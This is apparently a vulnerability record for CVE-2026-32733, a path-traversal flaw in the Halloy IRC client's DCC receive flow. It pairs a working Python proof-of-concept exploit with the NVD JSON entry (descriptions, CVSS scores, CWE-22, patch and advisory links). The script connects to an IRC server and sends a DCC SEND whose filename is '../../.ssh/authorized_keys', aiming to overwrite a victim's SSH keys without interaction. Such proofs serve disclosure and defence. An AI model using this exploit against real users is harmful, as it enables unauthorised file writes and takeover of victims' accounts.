CVE-2026-32733

import socket # This is a proof of concept to demonstrate the vulnerability. # It sends a malicious DCC SEND request to a target IRC server/channel. # The malicious filename contains path traversal sequences. TARGET_IP = "127.0.0.1" TARGET_PORT = 6667 NICKNAME = "attacker" CHANNEL = "#test" VICTIM_NICK = "victim" # Malicious filename attempting to write to .ssh/authorized_keys # Adjust the path traversal depth based on the victim's save_directory configuration MALICIOUS_FILENAME = "../../.ssh/authorized_keys" FAKE_IP = "127000001" # 127.0.0.1 in hex for DCC FAKE_PORT = "4444" FILE_SIZE = "100" def send_exploit(): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((TARGET_IP, TARGET_PORT)) # IRC Handshake sock.send(f"NICK {NICKNAME}\r\n".encode()) sock.send(f"USER {NICKNAME} 0 * :{NICKNAME}\r\n".encode()) sock.send(f"JOIN {CHANNEL}\r\n".encode()) # Send malicious DCC SEND request # Format: PRIVMSG <target> :\x01DCC SEND <filename> <ip> <port> <size>\x01 payload = f"PRIVMSG {VICTIM_NICK} :\x01DCC SEND {MALICIOUS_FILENAME} {FAKE_IP} {FAKE_PORT} {FILE_SIZE}\x01\r\n" sock.send(payload.encode()) print(f"[+] Sent malicious DCC SEND request with filename: {MALICIOUS_FILENAME}") except Exception as e: print(f"[-] Error: {e}") finally: sock.close() if __name__ == "__main__": send_exploit()

{"cve": {"id": "CVE-2026-32733", "sourceIdentifier": "[email protected]", "published": "2026-03-20T23:16:44.703", "lastModified": "2026-03-23T19:21:36.567", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Halloy is an IRC application written in Rust. Prior to commit 0f77b2cfc5f822517a256ea5a4b94bad8bfe38b6, the DCC receive flow did not sanitize filenames from incoming `DCC SEND` requests. A remote IRC user could send a filename with path traversal sequences like `../../.ssh/authorized_keys` and the file would be written outside the user's configured `save_directory`. With auto-accept enabled this required zero interaction from the victim. Starting with commit 0f77b2cfc5f822517a256ea5a4b94bad8bfe38b6, all identified code paths sanitize filenames through a shared `sanitize_filename` function."}, {"lang": "es", "value": "Halloy es una aplicación de IRC escrita en Rust. Antes del commit 0f77b2cfc5f822517a256ea5a4b94bad8bfe38b6, el flujo de recepción DCC no saneaba los nombres de archivo de las solicitudes entrantes 'DCC SEND'. Un usuario remoto de IRC podría enviar un nombre de archivo con secuencias de salto de ruta como '../../.ssh/authorized_keys' y el archivo se escribiría fuera del 'save_directory' configurado por el usuario. Con la autoaceptación habilitada, esto no requería ninguna interacción de la víctima. A partir del commit 0f77b2cfc5f822517a256ea5a4b94bad8bfe38b6, todas las rutas de código identificadas sanean los nombres de archivo a través de una función compartida 'sanitize_filename'."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:halloy:halloy:*:*:*:*:*:*:*:*", "versionEndIncluding": "2026.4", "matchCriteriaId": "EAB64661-0590-4ABE-B7BC-1D17D0681AC3"}]}]}], "references": [{"url": "https://github.com/squidowl/halloy/commit/0f77b2cfc5f822517a256ea5a4b94bad8bfe38b6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/squidowl/halloy/security/advisories/GHSA-fqrv-rfg4-rv89", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}